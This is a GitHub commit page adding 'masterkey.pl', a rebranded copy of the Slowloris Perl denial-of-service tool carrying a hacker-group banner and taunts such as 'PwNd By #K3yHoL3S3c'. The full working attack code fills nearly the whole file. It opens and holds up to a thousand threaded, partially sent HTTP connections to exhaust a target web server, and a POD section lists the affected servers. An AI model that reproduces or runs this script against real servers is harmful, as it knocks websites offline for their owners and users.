Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 1f31f09

Browse files
H1R0GH057H1R0GH057
authored
Create masterkey.pl
1 parent 5b35c46 commit 1f31f09

1 file changed

Lines changed: 363 additions & 0 deletions

File tree

masterkey.pl

Lines changed: 363 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,363 @@
1+
#!/usr/bin/perl -w
2+
use strict;
3+
use IO::Socket::INET;
4+
use IO::Socket::SSL;
5+
use Getopt::Long;
6+
use Config;
7+
8+
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
9+
10+
print <<EOTEXT;
11+
Welcome to MasterK3Y - the low bandwidth, yet greedy and poisonous HTTP client Re3v1s3d By: K3YHoL3S3c
12+
EOTEXT
13+
14+
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
15+
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
16+
my $result = GetOptions(
17+
'shost=s' => \$shost,
18+
'dns=s' => \$host,
19+
'httpready' => \$httpready,
20+
'num=i' => \$connections,
21+
'cache' => \$cache,
22+
'port=i' => \$port,
23+
'https' => \$ssl,
24+
'tcpto=i' => \$tcpto,
25+
'test' => \$test,
26+
'timeout=i' => \$timeout,
27+
'version' => \$version,
28+
);
29+
30+
if ($version) {
31+
print "Version 0.7\n";
32+
exit;
33+
}
34+
35+
unless ($host) {
36+
print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
37+
print "\n\tType 'perldoc $0' for help with options.\n\n";
38+
exit;
39+
}
40+
41+
unless ($port) {
42+
$port = 80;
43+
print "Defaulting to port 80.\n";
44+
}
45+
46+
unless ($tcpto) {
47+
$tcpto = 5;
48+
print "Defaulting to a 5 second tcp connection timeout.\n";
49+
}
50+
51+
unless ($test) {
52+
unless ($timeout) {
53+
$timeout = 100;
54+
print "Defaulting to a 100 second re-try timeout.\n";
55+
}
56+
unless ($connections) {
57+
$connections = 1000;
58+
print "Defaulting to 1000 connections.\n";
59+
}
60+
}
61+
62+
my $usemultithreading = 0;
63+
if ( $Config{usethreads} ) {
64+
print "Multithreading enabled.\n";
65+
$usemultithreading = 1;
66+
use threads;
67+
use threads::shared;
68+
}
69+
else {
70+
print "No multithreading capabilites found!\n";
71+
print "Slowloris will be slower than normal as a result.\n";
72+
}
73+
74+
my $packetcount : shared = 0;
75+
my $failed : shared = 0;
76+
my $connectioncount : shared = 0;
77+
78+
srand() if ($cache);
79+
80+
if ($shost) {
81+
$sendhost = $shost;
82+
}
83+
else {
84+
$sendhost = $host;
85+
}
86+
if ($httpready) {
87+
$method = "POST";
88+
}
89+
else {
90+
$method = "GET";
91+
}
92+
93+
if ($test) {
94+
my @times = ( "2", "30", "90", "240", "500" );
95+
my $totaltime = 0;
96+
foreach (@times) {
97+
$totaltime = $totaltime + $_;
98+
}
99+
$totaltime = $totaltime / 60;
100+
print "This test could take up to $totaltime minutes.\n";
101+
102+
my $delay = 0;
103+
my $working = 0;
104+
my $sock;
105+
106+
if ($ssl) {
107+
if (
108+
$sock = new IO::Socket::SSL(
109+
PeerAddr => "$host",
110+
PeerPort => "$port",
111+
Timeout => "$tcpto",
112+
Proto => "tcp",
113+
)
114+
)
115+
{
116+
$working = 1;
117+
}
118+
}
119+
else {
120+
if (
121+
$sock = new IO::Socket::INET(
122+
PeerAddr => "$host",
123+
PeerPort => "$port",
124+
Timeout => "$tcpto",
125+
Proto => "tcp",
126+
)
127+
)
128+
{
129+
$working = 1;
130+
}
131+
}
132+
if ($working) {
133+
if ($cache) {
134+
$rand = "?" . int( rand(99999999999999) );
135+
}
136+
else {
137+
$rand = "";
138+
}
139+
my $primarypayload =
140+
"GET /$rand HTTP/1.1\r\n"
141+
. "Host: $sendhost\r\n"
142+
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
143+
. "Content-Length: 42\r\n";
144+
if ( print $sock $primarypayload ) {
145+
print "Connection successful, now comes the waiting game...\n";
146+
}
147+
else {
148+
print
149+
"That's odd - I connected but couldn't send the data to $host:$port.\n";
150+
print "Is something wrong?\nDying.\n";
151+
exit;
152+
}
153+
}
154+
else {
155+
print "Uhm... I can't connect to $host:$port.\n";
156+
print "Is something wrong?\nDying.\n";
157+
exit;
158+
}
159+
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
160+
print "Trying a $times[$i] second delay: \n";
161+
sleep( $times[$i] );
162+
if ( print $sock "X-a: b\r\n" ) {
163+
print "\tWorked.\n";
164+
$delay = $times[$i];
165+
}
166+
else {
167+
if ( $SIG{__WARN__} ) {
168+
$delay = $times[ $i - 1 ];
169+
last;
170+
}
171+
print "\tFailed after $times[$i] seconds.\n";
172+
}
173+
}
174+
175+
if ( print $sock "Connection: Close\r\n\r\n" ) {
176+
print "Okay that's enough time. Slowloris closed the socket.\n";
177+
print "Use $delay seconds for -timeout.\n";
178+
exit;
179+
}
180+
else {
181+
print "Remote server closed socket.\n";
182+
print "Use $delay seconds for -timeout.\n";
183+
exit;
184+
}
185+
if ( $delay < 166 ) {
186+
print <<EOSUCKS2BU;
187+
Since the timeout ended up being so small ($delay seconds) and it generally
188+
takes between 200-500 threads for most servers and assuming any latency at
189+
all... you might have trouble using Slowloris against this target. You can
190+
tweak the -timeout flag down to less than 10 seconds but it still may not
191+
build the sockets in time.
192+
EOSUCKS2BU
193+
}
194+
}
195+
else {
196+
print
197+
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
198+
199+
if ($usemultithreading) {
200+
domultithreading($connections);
201+
}
202+
else {
203+
doconnections( $connections, $usemultithreading );
204+
}
205+
}
206+
207+
sub doconnections {
208+
my ( $num, $usemultithreading ) = @_;
209+
my ( @first, @sock, @working );
210+
my $failedconnections = 0;
211+
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
212+
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
213+
while (1) {
214+
$failedconnections = 0;
215+
print "\t\tPwNd By #K3yHoL3S3c.\n";
216+
foreach my $z ( 1 .. $num ) {
217+
if ( $working[$z] == 0 ) {
218+
if ($ssl) {
219+
if (
220+
$sock[$z] = new IO::Socket::SSL(
221+
PeerAddr => "$host",
222+
PeerPort => "$port",
223+
Timeout => "$tcpto",
224+
Proto => "tcp",
225+
)
226+
)
227+
{
228+
$working[$z] = 1;
229+
}
230+
else {
231+
$working[$z] = 0;
232+
}
233+
}
234+
else {
235+
if (
236+
$sock[$z] = new IO::Socket::INET(
237+
PeerAddr => "$host",
238+
PeerPort => "$port",
239+
Timeout => "$tcpto",
240+
Proto => "tcp",
241+
)
242+
)
243+
{
244+
$working[$z] = 1;
245+
$packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
246+
}
247+
else {
248+
$working[$z] = 0;
249+
}
250+
}
251+
if ( $working[$z] == 1 ) {
252+
if ($cache) {
253+
$rand = "?" . int( rand(99999999999999) );
254+
}
255+
else {
256+
$rand = "";
257+
}
258+
my $primarypayload =
259+
"$method /$rand HTTP/1.1\r\n"
260+
. "Host: $sendhost\r\n"
261+
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
262+
. "Content-Length: 42\r\n";
263+
my $handle = $sock[$z];
264+
if ($handle) {
265+
print $handle "$primarypayload";
266+
if ( $SIG{__WARN__} ) {
267+
$working[$z] = 0;
268+
close $handle;
269+
$failed++;
270+
$failedconnections++;
271+
}
272+
else {
273+
$packetcount++;
274+
$working[$z] = 1;
275+
}
276+
}
277+
else {
278+
$working[$z] = 0;
279+
$failed++;
280+
$failedconnections++;
281+
}
282+
}
283+
else {
284+
$working[$z] = 0;
285+
$failed++;
286+
$failedconnections++;
287+
}
288+
}
289+
}
290+
print "\t\tOne keyhole has opened the door to your all your security we.\n";
291+
foreach my $z ( 1 .. $num ) {
292+
if ( $working[$z] == 1 ) {
293+
if ( $sock[$z] ) {
294+
my $handle = $sock[$z];
295+
if ( print $handle "X-a: b\r\n" ) {
296+
$working[$z] = 1;
297+
$packetcount++;
298+
}
299+
else {
300+
$working[$z] = 0;
301+
#debugging info
302+
$failed++;
303+
$failedconnections++;
304+
}
305+
}
306+
else {
307+
$working[$z] = 0;
308+
#debugging info
309+
$failed++;
310+
$failedconnections++;
311+
}
312+
}
313+
}
314+
print
315+
"Current stats:\tThe K3Y Keeper now sent $packetcount Master K3Y to open your fire doors.\nK3YHoL3S3c will be back in $timeout seconds...\n\n";
316+
sleep($timeout);
317+
}
318+
}
319+
320+
sub domultithreading {
321+
my ($num) = @_;
322+
my @thrs;
323+
my $i = 0;
324+
my $connectionsperthread = 50;
325+
while ( $i < $num ) {
326+
$thrs[$i] =
327+
threads->create( \&doconnections, $connectionsperthread, 1 );
328+
$i += $connectionsperthread;
329+
}
330+
my @threadslist = threads->list();
331+
while ( $#threadslist > 0 ) {
332+
$failed = 0;
333+
}
334+
}
335+
336+
__END__
337+
338+
=head1 TITLE
339+
340+
K3YHoL3S3cUr1tY INVASION
341+
=head1 VERSION
342+
343+
Version 1.0 Stable
344+
345+
=head1 DATE
346+
347+
02/11/2013
348+
349+
=head1 AUTHOR
350+
351+
Laera Loris [email protected]
352+
353+
=head1 ABSTRACT
354+
355+
Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
356+
357+
=head1 AFFECTS
358+
359+
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?
360+
361+
=head1 NOT AFFECTED
362+
363+
IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?

0 commit comments

Comments
 (0)